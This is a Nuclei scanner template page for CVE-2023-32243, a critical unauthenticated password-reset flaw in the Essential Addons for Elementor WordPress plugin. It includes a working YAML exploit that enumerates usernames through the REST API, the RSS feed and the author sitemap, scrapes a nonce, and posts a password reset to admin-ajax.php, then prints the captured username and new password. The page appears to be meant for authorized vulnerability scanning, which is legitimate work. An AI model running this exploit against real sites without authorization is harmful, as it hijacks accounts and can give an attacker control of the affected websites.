WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset
ID: CVE-2023-32243
Severity: critical
Author: DhiyaneshDK,Vikas Kundu
Tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper
Description
Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
YAML Source
id: CVE-2023-32243

info:
  name: WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset
  author: DhiyaneshDK,Vikas Kundu
  severity: critical
  description: |
    Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
  impact: |
    An attacker can gain unauthorized access to user accounts and potentially take control of the affected WordPress website.
  remediation: |
    Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32243
    - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve
    - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py
    - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
    - https://patchstack.com/database/vulnerability/essential-addons-for-elementor-lite/wordpress-essential-addons-for-elementor-plugin-5-4-0-5-7-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-32243
    cwe-id: CWE-287
    epss-score: 0.08653
    epss-percentile: 0.94489
    cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: wpdeveloper
    product: essential_addons_for_elementor
    framework: wordpress
    google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite
  tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wp-json/wp/v2/users/ HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /?rest_route=/wp/v2/users HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /feed/ HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /author-sitemap.xml HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}

    payloads:
      password:
        - "{{randstr}}"

    host-redirects: true
    max-redirects: 2
    stop-at-first-match: true

    matchers:
      - type: word
        part: body_6
        words:
          - '"success":true'
          - '"data":'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true

      - type: json
        part: body
        name: wordpress_username
        group: 1
        json:
          - '.[] | .slug'
          - '.[].name'
        internal: true

      - type: regex
        part: body_4
        name: wordpress_username
        group: 1
        regex:
          - '<dc:creator><!\[CDATA\[([A-Za-z]+)\]\]><\/dc:creator>'
        internal: true

      - type: regex
        part: body_5
        name: wordpress_username
        group: 1
        regex:
          - '\/author\/([a-z-]+)\/'
        internal: true

      - type: dsl
        dsl:
          - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password'
# digest: 4b0a00483046022100afbd7edf3f446438348f874d31828e18547e083272383faf36f304ac90eec657022100a9f5b3a652cc7df75326ee68024f87517e9ea4969b604f2f73b5d52f7468dec5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner to check a target WordPress site for the vulnerability described above. It is tagged intrusive: on a successful match, the final request actually resets the password of the enumerated user to the random value shown in the output, so run it only against systems you are authorized to test and expect to restore that account afterwards.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-32243.yaml"